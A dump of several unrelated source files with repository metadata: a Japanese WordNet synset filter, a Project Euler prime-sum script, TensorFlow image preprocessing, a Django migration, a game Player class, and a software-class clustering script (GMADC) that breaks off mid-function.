synset.words.append(lemma)
n += 1
word_counter[lemma] = word_counter.get(lemma, 0) + n
# 不要なsynsetを取り除く
# 必要なものを 単語 -> [synset] に変換
del_ssids = []
word_table = {}
for ssid in synsets:
synset = synsets[ssid]
num_words = len(synset.words)
if num_words == 0:
# 単語が含まれない
pass
elif synset.definition is None and num_words == 1:
# 定義文がなく、ぶら下がっている単語が1つ
pass
elif max(word_counter[word] for word in synset.words) == 1:
# 含まれる全ての単語がこの意味しか持っていない
pass
else:
# 削除対象外なので、単語 -> [synset] に追加
for word in synset.words:
word_table.setdefault(word, []).append(synset)
continue
# 上記の条件に該当したものを削除する
del_ssids.append(ssid)
# 削除対象を削除
for ssid in del_ssids:
del synsets[ssid]
# 1つの単語が複数のsynsetを持っているが、どのsynsetも1つの単語(この単語)しか持っていない
for word in word_table:
word_synsets = word_table[word]
if max(len(synset.words) for synset in word_synsets) == 1:
for synset in word_synsets:
del synsets[synset.ssid]
# リストに変換して戻す
return ((synsets[ssid] for ssid in synsets), ignored)
def write_ss(synset_list):
with codecs.open('ss.' + FILENAME_SUFFIX + '.csv', 'w', encoding=CODING, errors=ERRORS) as sscsv:
for synset in synset_list:
#sscsv.write(synset.ssid)
#sscsv.write(u'\t')
definition = synset.definition
if definition is None:
definition = u''
sscsv.write(definition)
sscsv.write(u'\t')
sscsv.write(u'\t'.join(synset.words))
sscsv.write(u'\n')
def write_ig(ignored_list):
with codecs.open('ig.' + FILENAME_SUFFIX + '.csv', 'w', encoding=CODING, errors=ERRORS) as igcsv:
for ig in ignored_list:
igcsv.write(ig.ssid)
igcsv.write(u'\t')
igcsv.write(ig.definition)
igcsv.write(u'\n')
def main(filename):
import time
def ptime(message):
print time.strftime('%Y-%m-%d %H:%M:%S'), message
ptime('parsing a xml...')
tree = ElementTree()
tree.parse(filename)
ptime('parsed.')
ptime('generating a graph...')
synset_list, ignored_list = generate_graph(tree)
ptime('generated.')
ptime('writeing ss.csv...')
write_ss(synset_list)
ptime('wrote.')
ptime('writeing ig.csv...')
write_ig(ignored_list)
ptime('wrote.')
if __name__ == '__main__':
#import psyco
#psyco.full()
main('jpn_wn_lmf.xml')
| [
"shisashi@gmail.com"
] | shisashi@gmail.com |
cc4fc21e5644b816307f3f355f00cde6b41b4d92 | ab4fd9eed607a25f214d830d12ebc6149b4a7bc4 | /Page1/Euler10.py | 32b10f6ab4ad059a6c4db9d0d8c05dbab99e0a34 | [] | no_license | lj8175/Euler | 422b31cef99b31030d91f5b49c92016e2a923d2f | 9a48771754fe4af964a5f8384eb65edde238620f | refs/heads/master | 2021-01-23T13:22:38.151411 | 2013-12-24T02:51:06 | 2013-12-24T02:51:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | '''
Created on 2013-5-23
@author: lj8175
'''
import math
import time
def isPrime(x):
if x<=1 :return False
elif x%2 == 0: return False if x!=2 else True
elif x%3 == 0: return False if x!=3 else True
elif x%5 == 0: return False if x!=5 else True
elif x%7 == 0: return False if x!=7 else True
for i in range(11,int(math.sqrt(x)) + 1):
if x % i == 0:
return False
return True
if __name__ == '__main__':
begin = time.clock()
s = 0
for i in range(int(2e6)):
if isPrime(i):
s += i
#print i
print s
print time.clock() - begin
pass | [
"lj8175@gmail.com"
] | lj8175@gmail.com |
d44d220f05307a06e04c9b879cb6b91ea97e3d90 | 603a1ae4724e69ffd8cb2990b998b31a36e31e21 | /data_processor.py | fe8c2dfa7b517223f458bfee1837af3d230e4352 | [] | no_license | evan4C/FiberMeasure | 77cbcc687c66bd2a8b9320a18769bd4714ccf6ba | 3dc92f19dc0e54316ad1f40338c7ae6120b1f279 | refs/heads/main | 2023-03-05T12:21:27.633978 | 2021-02-11T00:17:53 | 2021-02-11T00:17:53 | 337,888,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | import glob
import numpy as np
import csv
import tensorflow as tf
import config
def data_processor(data_dir):
"""
convert all csv into one csv file named 'label.csv'
"""
output = data_dir + '/label.csv'
with open(output, 'w', newline='') as f:
writer = csv.writer(f)
point_files = sorted(glob.glob(data_dir + '/*000000.csv'))
for file in point_files:
points = np.loadtxt(file, skiprows=1, delimiter=',')
points = points.flatten()[:15]
writer.writerow(points)
def preprocess_image(image, img_size):
image = tf.image.decode_jpeg(image, channels=1)
image = tf.image.resize(image, [img_size, img_size])
image /= 255.0 # normalize to [0,1] range
return image
def load_and_preprocess_image(path):
image = tf.io.read_file(path)
img_size = config.img_size
return preprocess_image(image, img_size)
if __name__ == '__main__':
data_dir = ''
data_processor(data_dir)
| [
"33539261+evan4C@users.noreply.github.com"
] | 33539261+evan4C@users.noreply.github.com |
7e91ac82b07430fcb05da9493ea7cb4f7d00155e | 48df53e66257df2a17ea71118d1374f06a54074d | /webapp(authority)/accounts/migrations/0008_auto_20200728_1341.py | fef0dd2ecec248780b7603029ac6a081930f85fe | [] | no_license | sih2020admin/4485_Team_TIAS | a6b30e3907b2d182c6ed9816c8d1ae15a1559705 | eade305410ee8cb9d0bf091bfec440c0463dbd2b | refs/heads/master | 2022-11-26T13:53:00.273846 | 2020-08-03T12:54:02 | 2020-08-03T12:54:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,961 | py | # Generated by Django 2.2 on 2020-07-28 08:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0007_userdetails_parentuser'),
]
operations = [
migrations.AlterField(
model_name='userdetails',
name='aadhar',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=12, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='address',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=255, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='city',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=72, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='country',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=72, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='dlicense',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=14, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='dob',
field=models.DateField(error_messages={1: 'Enter Valid Information'}, help_text='Enter in DD/MM/YYYY Format', null=True),
),
migrations.AlterField(
model_name='userdetails',
name='email',
field=models.EmailField(error_messages={1: 'Enter Valid Information'}, max_length=254, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='firstname',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=140, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='gender',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=7, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='height',
field=models.IntegerField(error_messages={1: 'Enter Valid Information'}, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='lastname',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=140, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='pancard',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=10, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='passport',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=14, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='placeOfBirth',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=140, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='prev_records',
field=models.CharField(max_length=1000, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='unique_feature',
field=models.TextField(error_messages={1: 'Enter Valid Information'}, max_length=255, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='zipcode',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=10, null=True),
),
]
| [
"raj.parab99@yahoo"
] | raj.parab99@yahoo |
112b1df405c6303a6b7848686721b023e19e0df3 | 042d77509eab03b1c3099635ed046ccd4a1e341c | /Player.py | c58b5d850d16c5f1c42c3eb1ffc2c18754e7db0d | [] | no_license | thezerothcat/catspygame | cc81d12bc80be3506478b5032658b27fe25c25be | 171b2d02a9917672823270bc307166cf1068312c | refs/heads/master | 2021-03-16T09:42:53.751211 | 2017-07-11T05:44:05 | 2017-07-11T05:44:05 | 4,227,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import CellObject
import Stats
import Characters
class Player:
def __init__(self, name = 'Hero'):
self.characters = [ Characters.Character('Hero') ]
self.characters[0].name = name
self.money = 0
self.progress = 0
self.purchases = 0
def send(self):
out = []
for character in self.characters:
out.append(character.send())
data = {'money':self.money, 'purchases':self.purchases, 'progress':self.progress, 'characters':out}
def receive(self, data):
guys = []
for character_data in data['characters']:
guy = Characters.Character('Hero')
guys.append(guy.receive(character_data))
self.money = data['money']
self.progress = data['progress']
self.purchases = data['purchases']
# will allow scene review later
# self.scenes = []
# self.human = human
# 'Apple', 'Apple', 'Apple', 'Apple', 'Bomb', 'Apple', 'Apple', 'Bomb', 'Apple', 'Bomb'
| [
"thezerothcat@gmail.com"
] | thezerothcat@gmail.com |
ba23c62100db116efd7324951a64756cd5c57c2b | 0e02d2c70ccdd94f3272baa7fad926e82edd3fa1 | /filmFinder/forms.py | c1fbe6ad4f5b1dd463c4a09156e47f005de021ce | [] | no_license | Kevin-zry/COMP9900-Project | 4e673c2217785c278f10fce4043b5ace84ac2a60 | 87b9d6b796ae596c6bf60f9a1b2a0a0a53854f10 | refs/heads/master | 2023-02-25T09:18:04.238167 | 2020-11-18T10:53:31 | 2020-11-18T10:53:31 | 335,922,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,801 | py | from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from flask_login import current_user
from wtforms import StringField, PasswordField, SubmitField, BooleanField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from wtforms import TextAreaField, IntegerField
from wtforms.validators import NumberRange
from filmFinder.models import USERPROFILES
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[
DataRequired(), Length(min=2, max=20)])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Sign Up')
def validate_username(self, username):
if USERPROFILES.query.filter_by(username=username.data).count() > 0:
raise ValidationError(
'This username is taken. Please choose a different one.')
def validate_email(self, email):
if USERPROFILES.query.filter_by(email=email.data).count() > 0:
raise ValidationError(
'This email is registered. Please choose a different one.')
class LoginForm(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember Me')
submit = SubmitField('Login')
class UpdateAccountForm(FlaskForm):
username = StringField('Username',
validators=[DataRequired(), Length(min=2, max=20)])
email = StringField('Email',
validators=[DataRequired(), Email()])
picture = FileField('Update Profile Picture', validators=[
FileAllowed(['jpg', 'png'])])
submit = SubmitField('Update')
def validate_username(self, username):
if username.data != current_user.username:
user = USERPROFILES.query.filter_by(username=username.data).first()
if user:
raise ValidationError(
'That username is taken. Please choose a different one.')
def validate_email(self, email):
if email.data != current_user.email:
user = USERPROFILES.query.filter_by(email=email.data).first()
if user:
raise ValidationError(
'That email is taken. Please choose a different one.')
class ReviewForm(FlaskForm):
rating = IntegerField('Rating', validators=[NumberRange(min=1, max=5)])
review = TextAreaField('Review', validators=[DataRequired()])
submit = SubmitField('Save')
| [
"53029382+zjx210000@users.noreply.github.com"
] | 53029382+zjx210000@users.noreply.github.com |
913c44aa9b6797ec1bd2b9a40a0ac353e36481c9 | 68a2d5c4cfcf548dc689b7119bd66fe3ccfa7178 | /LogAnalyser/acuros_sap/exceptions.py | bdb4dc14874343b51f0f8ad4b451d8d311e34f3c | [] | no_license | sunghwanJo/ASAP-Log-Analyser | 21dce9db0d96751376d54041af517ebeb2a38c0a | 96cd7228dd9df15da361191decaeedbe7f451023 | refs/heads/master | 2020-12-24T23:38:54.829234 | 2012-10-01T19:55:45 | 2012-10-01T19:55:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 651 | py | import inspect
class ASAPError(Exception):
def __init__ (self, message):
self.caller = inspect.stack()[2]
self.message = message
def __str__ (self):
return self.message
class UnsupportedRequestMethodError(ASAPError):
pass
class UnsupportedVersionError(ASAPError):
pass
class NoParameterError(ASAPError):
pass
class InvalidParameterError(ASAPError):
pass
class WrongFormatError(ASAPError):
pass
class NotAuthenticatedUserError(ASAPError):
pass
class InternalServerError(ASAPError):
pass
class IllegalStateError(ASAPError):
pass
class TimeExpiredError(ASAPError):
pass
| [
"acuros@MacBookAir"
] | acuros@MacBookAir |
6b418aade73b04779dc6fb50c19ad61dab4275ce | f423abe5f0e4d627dda7aa9cc6bfc8819ca62d1d | /py/bin/wheel | 38b044491d0b29aab03a4d310a9d628a9a174808 | [] | no_license | emiliowl/flask-nonsense-sample | 114fee7d13d285d6c2b9353d1438c6ad6bd1e46d | 229577416634723b866bab6de7a1b2daec29438e | refs/heads/master | 2021-07-24T04:50:07.102407 | 2020-03-22T12:57:53 | 2020-03-22T12:57:53 | 249,181,380 | 0 | 0 | null | 2021-03-20T03:06:50 | 2020-03-22T12:45:14 | Python | UTF-8 | Python | false | false | 242 | #!/Users/murta/Desktop/ro.flask/py/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"emilio.murta@msitbrasil.com"
] | emilio.murta@msitbrasil.com | |
daa219e526b593e94fe224b572c49d8ae958e6c8 | 544d724907670b1e38418f7220ba6693ffbbfebf | /Matplotlib/colorMapContour.py | 86f97581907e50ec7e6676e6d27da745edf38b21 | [
"MIT"
] | permissive | dominiceggerman/PythonWork | b977f220febe5fddaf657274e8353c8fad1ac90e | 1e4195842f93165cc4a54c98fa603f3b5eeb921e | refs/heads/master | 2020-03-22T01:19:45.917452 | 2019-01-28T16:44:58 | 2019-01-28T16:44:58 | 139,298,118 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | # Colormap and contour graph
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
if __name__ == "__main__":
# Data
m = np.linspace(0, np.pi, 100)
n = np.linspace(0, 2*np.pi, 100)
x, y = np.meshgrid(m, n)
z = x * y
# Figure
fig, ax = plt.subplots(1, 2, figsize=(12, 4))
# ColorMap
p = ax[0].pcolor(x, y, z, cmap=cm.RdBu, vmin=abs(z).min(), vmax=abs(z).max())
cb = fig.colorbar(p, ax=ax[0])
# Contour
cnt = ax[1].contour(z, cmap=cm.RdBu, vmin=abs(z).min(), vmax=abs(z).max(), extent=[0, 1, 0, 1])
# Show
plt.tight_layout()
plt.show() | [
"dominiceggerman@gmail.com"
] | dominiceggerman@gmail.com |
93aab3250554398df06b12f5c3edf83d0c55d790 | 7de73bcf5452209028459a908d4d5ebdb8cc3794 | /short_url/management/commands/update_db.py | 8697d5a2a936df37e764e04c4f07aaa3f42ec3d5 | [] | no_license | abhishekrana10/urlshortner | 51567e2481919d160c91463a8430c87614deae62 | 56779bdd703b37047936f947a589e8f4f434788c | refs/heads/master | 2020-03-08T11:01:35.626613 | 2018-06-07T14:30:04 | 2018-06-07T14:30:04 | 128,087,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,619 | py | from django.core.management.base import BaseCommand, CommandError
from django.db import models
from short_url.models import url_mapping, deleted_url, url_stats
import datetime
import time
class Command(BaseCommand):
help = 'Command to do........'
def add_argument(self, parser):
pass
def handle(self, *args, **options):
try:
time_up = datetime.datetime.today()
time_update = int(time.mktime(time_up.timetuple()))
query_set = url_mapping.objects.all()
stats_query = url_stats.objects.all()
stats_const = 1.0
for obj in query_set:
time_added=int(obj.added)
print(time_added)
timediff=float((time_update-time_added)/2592000)
print(timediff)
ttl_month=float(obj.ttl)
if obj.ttl==-1:
pass
elif timediff > ttl_month:
#entry=url_mapping.objects.get(short_url=obj.short_url)
deleted_url_instance = deleted_url(deleted_entry=obj.short_url)
deleted_url_instance.save()
url_mapping.objects.filter(short_url=obj.short_url).delete()
for code_obj in stats_query:
hit_time = int (code_obj.hit_time)
print(hit_time)
del_time = float((time_update-hit_time)/2592000)
if del_time > stats_const:
url_stats.objects.filter(short_url=code_obj.short_url).delete()
except Exception as e:
CommandError(repr(e)) | [
"ar10695@gmail.com"
] | ar10695@gmail.com |
94aacbf9a71ea41a6ccdc6b32c67f82aa1c6740b | d73f90f10cbf06d10b7ee0803c00919eca28f7d9 | /Skoarcery/pymp/skoarmantics.py | 0608ac622688db2671be56e430366141e1563da5 | [
"Artistic-2.0"
] | permissive | rmg/Skoarcery | 80a72e46cba038780e6c51a47233608ac9ddc2a4 | 69efc07c7d2e0d742674e63c6626bc3d075b7af6 | refs/heads/master | 2020-04-10T08:31:52.339287 | 2014-07-24T22:27:56 | 2014-07-24T22:27:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,005 | py | # ============
# Skoarmantics
# ============
#
# We went depth first so our children should be defined
#
def msg_chain_node(skoar, noad):
pass
def beat(skoar, noad):
noad.absorb_toke()
noad.beat = noad.toke
noad.is_beat = True
def meter_beat(skoar, noad):
noad.absorb_toke()
noad.beat = noad.toke
def listy(skoar, noad):
from Skoarcery.pymp.lex import Toke_ListSep
X = []
for x in noad.children[1:-1]:
if x.toke and isinstance(x.toke, Toke_ListSep):
continue
X.append(x)
noad.replace_children(X)
def clef(skoar, noad):
pass
def meter_symbolic(skoar, noad):
pass
def stmt(skoar, noad):
pass
def musical_keyword_misc(skoar, noad):
pass
def coda(skoar, noad):
pass
def meter_ass(skoar, noad):
pass
def assignment(skoar, noad):
pass
def accidentally(skoar, noad):
pass
def boolean(skoar, noad):
pass
def ottavas(skoar, noad):
pass
def skoaroid(skoar, noad):
pass
def msg(skoar, noad):
pass
def dal_goto(skoar, noad):
pass
def cthulhu(skoar, noad):
pass
def dynamic(skoar, noad):
pass
def optional_carrots(skoar, noad):
pass
def meter_sig_prime(skoar, noad):
pass
def meter(skoar, noad):
# trim start and end tokens
noad.replace_children(noad.children[1:-1])
def marker(skoar, noad):
from Skoarcery.pymp.lex import Toke_Bars
noad.absorb_toke()
skoar.add_marker(noad)
toke = noad.toke
if isinstance(toke, Toke_Bars):
if toke.pre_repeat > 0:
noad.performer = (lambda x: x.jmp_colon(noad))
def noaty(skoar, noad):
pass
def noat_literal(skoar, noad):
from Skoarcery.pymp.lex import Toke_NamedNoat
noat = noad.absorb_toke()
noad.noat = noat
if isinstance(noat, Toke_NamedNoat):
noad.performer = (lambda x: x.noat_go(noat))
def noat_reference(skoar, noad):
# TODO Symbol | CurNoat | listy
pass
def pedally(skoar, noad):
pass
| [
"lucas@neoboolean.com"
] | lucas@neoboolean.com |
7529046e65fc24965ea205d3d721b755821fce1b | 1877971a590e9748a909768e21c458bcf9e73dcd | /utils/data_generate/__init__.py | 01176292c204efbaaeed9efd1dd0ff039fbaf716 | [] | no_license | zhoukaii/RankIQA.PyTorch | 805ad67fcf81ecafbcc2108269957da47a4c13ab | fad8c07d7b45e59b1384cdb0a31724a395ee3a86 | refs/heads/master | 2023-03-17T04:14:40.390159 | 2020-06-20T18:04:19 | 2020-06-20T18:04:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48 | py | # -*- coding: utf-8 -*-
""" 数据集生成 """
| [
"guanliang.zyw@alibaba-inc.com"
] | guanliang.zyw@alibaba-inc.com |
3c24d1ccc752ace27c95fbd46e301893a6ab785a | 984e5e8da4e1324b68178678ed934b83ff891500 | /GMADC.py | 4330413a22d21fc4c36a8e14fc667e58d3769b23 | [
"MIT"
] | permissive | mablue/GMADC | d1dc701af31dde7034db2bc04ba674e4716bb30b | bf4ab9123cc90ad0d8cf0b9ffe56c5492d4c250d | refs/heads/main | 2023-07-14T14:56:33.200944 | 2021-08-29T22:33:48 | 2021-08-29T22:33:48 | 401,150,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,727 | py | #=============================================================================#
# GMADC Algorythm(Its main file to run) #
# To solve random choise on disconected Softwere class graps. #
# By: Masoud Azizi Email: mablue92@gmail.com #
#=============================================================================#
import ntpath
import os
import random
import subprocess
import time
import numpy as np
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
# from matplotlib import pyplot as plt
from numpy import inf
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import shortest_path
# from progress.bar import Bar
# for drawing plot
from callgraph import CallGraph
#My text mining algorithm to classify disconnected classes in GMA
from GMADCC import GMADisconnectedClassClassifier as gmadc
newGmadc=None
# To prevent from loops in chain that will make by text similarity
disconnectedClassesIndex=list()
# disSimList: disconnected classes+Similar Classes that obtained form GMADCC (ex: disSimList=[[3,4],[1,3],[0,2]])
disSimList=list()
# disconnected classes index list
dccil = list()
dcSim=list()
dcAndSim = list()
filePaths=None
# search in 2d arrays by value
def index_2d(data, search):
for i, e in enumerate(data):
try:
return i, e.index(search)
except ValueError:
pass
raise ValueError("{} is not in list".format(repr(search)))
# create Similarity Matrix
def createSimilarityMatrix(shortestCallMatrix):
# print("createSimilarityMatrix(shortestCallMatrix)")
tempMatrix = [[0 for i in range (len (shortestCallMatrix))] for i in range (len (shortestCallMatrix))]
v = len (tempMatrix)
maximum = -1
for i in range(0,v):
max_temp = max(shortestCallMatrix[i])
if maximum < max_temp:
maximum = max_temp
if maximum == 0:
print("all classes are in its own cluster!")
exit()
for i in range (0, v):
for j in range (0, v):
if shortestCallMatrix[i][j] == 0 and i !=j:
tempMatrix[i][j] = maximum
else:
tempMatrix[i][j] = shortestCallMatrix[i][j]
for i in range (0,v):
for j in range (0, v):
tempMatrix[i][j] = 1 - tempMatrix[i][j]/maximum
return tempMatrix
# Initializing
def initializing(k , n, similarityMatrix):
# print("initializing")
centers = generateRandomCenter(k, n)
#print(centers)
clusters = fillClustersBasedOnCenter(k, n, similarityMatrix, centers)
return clusters
# Fill Clusters Based On Center
def fillClustersBasedOnCenter(k, n, similarityMatrix, centers):
# print("fillClustersBasedOnCenter(k, n, similarityMatrix, centers)")
disconnectedClassesIndex=list()
for i in range(n): # initialize base step, center of a cluster remains in index 0 of each list
index = 0
clusterNumber = centers[0][0]
maxSimilarity = similarityMatrix[i][clusterNumber]
for j in range(1,k):
clusterNumber = centers[j][0]
###################################################
#############, (#####################
######### #################
######. *#%#, %##############
####/ %############### #############
### ##################### ###########
## ######################### ##########
#& ##########################. ##########
# ########################### ##########
#, ########################### &#########
## ######################### ##########
##& ####################### ###########
#### ################### ############
##### ############* ###########
######## /########
########### # ######
################# ######### ,###
###################################### #
######################################## #
########################################### ####
###################################################
if maxSimilarity < similarityMatrix[i][clusterNumber]:
maxSimilarity = similarityMatrix[i][clusterNumber]
index = j
# print("<",i,j)
# Place that we reach to a disconnected class and MA_MS algo starts his text mining calculation to find a
# similarity between other classes and make a chain with other clusters and disconnected classes
elif maxSimilarity == similarityMatrix[i][clusterNumber] and j==1:
# disconnectedClassesIndex.append(i)
# if disconnectedClassesIndex.count(i)==2:
if i not in dccil:
dccil.append(i)
dcAndSim.append([i,i])
# print(dccil)
# print(dccil)
# print(clusterNumber)
# disconnectedClassesIndex.append(i)
# if disconnectedClassesIndex.count(i)==2:
# print("---------------------------------------------")
# dcsi = newGmadc.getDisconnectedClassCenter(disconnectedClassesIndex,filePaths,clusterNumber)
# if disSimList.count((i,dcsi))<1:
# disSimList.append((i,dcsi))
# print(disconnectedClassesIndex)
# pass
# elif maxSimilarity > similarityMatrix[i][clusterNumber]:
# print(">",i,j)
# pass
# print("filePath(i={},j={})={},MaxSim={},SimMat[{}][{}]={}".format(i,j,filePaths[i],maxSimilarity,i,clusterNumber,similarityMatrix[i][clusterNumber]))
temp = []
temp = centers[index]
if i != temp[0]:
temp.append(i)
centers.pop(index)
centers.insert(index,temp)
# print("i:", i, "index:", index, "sim:", maxSimilarity, "centers:", centers)
return centers
# Generate Random Center
def generateRandomCenter(k, n):
# print("generateRandomCenter(k, n)")
clusters = []
center = random.sample(range(n), k) #create k random center of k-means
#print(center)
for j in range(k): #transform k centers to 2 dimentionals array
c = center.pop(0)
clusters.append([c])
del(center)
#print(clusters)
return clusters
# Copy
def copy(matrix):
# print("copy(matrix)")
l = len(matrix)
temp = []
for i in range(0,l):
temp.append([])
m = len(matrix[i])
for j in range(0,m):
temp[i].append(matrix[i][j])
return temp
# Correct Center
def correctCenter(clusters, similarityMatrix):
# print("correctCenter(clusters, similarityMatrix)")
clustersUpdateCenter = []
for centerIndex in range(k):
clustersBackup = copy(clusters)
popedCluster = clustersBackup.pop(centerIndex)
# print("popedCluster:", popedCluster)
sameSimIndex = [0]
maxSimilarity = 0
for i in range(0, len(popedCluster)):
popedClusterSimilaritySum = 0
for j in range(0, len(popedCluster)):
popedClusterSimilaritySum = popedClusterSimilaritySum + similarityMatrix[popedCluster[i]][popedCluster[j]]
# print(popedCluster[i], ":" , popedClusterSimilaritySum)
if popedClusterSimilaritySum > maxSimilarity:
maxSimilarity = popedClusterSimilaritySum
sameSimIndex.clear()
sameSimIndex.append(i)
elif popedClusterSimilaritySum == maxSimilarity:
sameSimIndex.append(i)
# print(i)
# print(sameSimIndex)
# print("sameSimIndex: ", sameSimIndex, "maxSimilarity: ",maxSimilarity)
if len(sameSimIndex) == 1:
val = popedCluster[sameSimIndex[0]]
# print(popedCluster)
popedCluster.remove(val)
# print(popedCluster)
popedCluster.insert(0, val)
# print(popedCluster)
clustersUpdateCenter.append(popedCluster)
# print("OK, clustersUpdateCenter: ",clustersUpdateCenter,"\n")
elif len(sameSimIndex) > 1:
tempMinOtherSim = n
for i in range(len(sameSimIndex)):
sumOtherSimilarity = 0
val = popedCluster[sameSimIndex[i]]
for j in range(k-1):
for m in range(len(clustersBackup[j])):
sumOtherSimilarity = sumOtherSimilarity + similarityMatrix[val][clustersBackup[j][m]]
# print("val:" ,val, "sumOtherSimilarity:",sumOtherSimilarity)
if tempMinOtherSim > sumOtherSimilarity:
tempMinOtherSim = sumOtherSimilarity
tempVal = val
# print("tempVal:", tempVal)
popedCluster.remove(tempVal)
popedCluster.insert(0, tempVal)
clustersUpdateCenter.append(popedCluster)
# print("NOK, clustersUpdateCenter: ",clustersUpdateCenter,"\n")
return clustersUpdateCenter
# Compute Similarity Function
def computeSimilarityFunction(matrix , similarityMatrix):#sum of similarity of all clusters
# print("computeSimilarityFunction(matrix , similarityMatrix)")
function = 0
for i in range(k):
for j in range(1, len(matrix[i])):
function = function + similarityMatrix[matrix[i][0]][matrix[i][j]]
return function
# Clustering
def clustering(k, n, similarityMatrix, clustersUpdateCenter):
# print("clustering(k, n, similarityMatrix, clustersUpdateCenter)")
clusterOld = copy(clustersUpdateCenter)
iteration = 0
flag = 0
while iteration <1000 and flag < 5:
iteration = iteration + 1
clusterNew = []
# print("old:", id(clusterOld), "new:", id(clusterNew) , "d:", id(clusterOld)-id(clusterNew),"\n")
for i in range(k):
clusterNew.append([clusterOld[i][0]])
# print(centerUpdate)
clusterNew = fillClustersBasedOnCenter(k, n, similarityMatrix, clusterNew)
# print("clusterNew: ",clusterNew)
# similarityFunctionUpdate = computeSimilarityFunction(clusterNew, similarityMatrix)
# print("similarityFunctionUpdate: ",similarityFunctionUpdate,"\n")
clusterNew = correctCenter(clusterNew, similarityMatrix)
# print("clustersUpdateCenter: ",clusterNew)
# similarityFunctionUpdate = computeSimilarityFunction(clusterNew, similarityMatrix)
# print("similarityFunctionUpdate: ",similarityFunctionUpdate,"\n")
# check for continuing
tempNew = copy(clusterNew)
tempOld = copy(clusterOld)
# print(id(tempNew),id(tempOld),id(clusterNew),id(clusterOld))
for i in range(len(tempNew)):
tempNew[i].sort()
tempNew.sort()
# print("Sorted New: ", tempNew)
for i in range(len(tempOld)):
tempOld[i].sort()
tempOld.sort()
# print("Sorted Old: ", tempOld)
# print()
if(tempNew == tempOld):
flag = flag + 1
del(tempNew)
del(tempOld)
clusterOld = copy(clusterNew)
return clusterNew
# Unused
# Exporting To MoJo Format Algorithm Manual
def exportingToMoJoFormatAlgorithmManual(k, n, clustersFinal):
# print("exportingToMoJoFormatAlgorithmManual(k, n, clustersFinal)")
for i in range(k):
clustersFinal[i].sort()
clustersFinal.sort()
f1 = open ("MoJoAlgorithmManual.txt", "w")
for centerIndex in range(k):
for i in range(len(clustersFinal[centerIndex])):
f1.write("contain ")
f1.write("hulu")
f1.write(str(centerIndex))
f1.write(" ")
f1.write(str(clustersFinal[centerIndex][i]))
f1.write("\n")
f1.close()
# exportingToMoJoFormatExpert
def exportingToMoJoFormatExpert(fileNames, filePathNames, folderPathResult):
# print("exportingToMoJoFormatExpert(fileNames, filePathNames, folderPathResult)")
temp = []
for i in range(len(fileNames)):
# temp[i][1] = fileNames[i]
indexCluster = findInTofilePtheNames (fileNames[i], filePathNames)
if indexCluster == -1:
print("Cluster Conflict class ", fileNames[i])
return
# temp[i][0] = filePathNames[indexCluster][0]
temp.append([filePathNames[indexCluster][0], fileNames[i]])
temp.sort()
f1 = open (folderPathResult + "/MoJoExpert.txt", "w")
for i in range(len(fileNames)):
f1.write("contain ")
f1.write(temp[i][0])
f1.write(" ")
f1.write(temp[i][1])
f1.write("\n")
f1.close()
del(temp)
# findInTofilePtheNames
def findInTofilePtheNames (className, filePathNames):
# print("findInTofilePtheNames (className, filePathNames)")
index = -1
for i in range(len(filePathNames)):
if className == filePathNames[i][1] or className == filePathNames[i][2]:
if index == -1:
index = i
else:
return -1
return index
# findInTofilePtheNames
def exportingToMoJoFormatAlgorithm(k, n, clustersFinal, fileNames, filePathNames, run_no, folderPathResult):
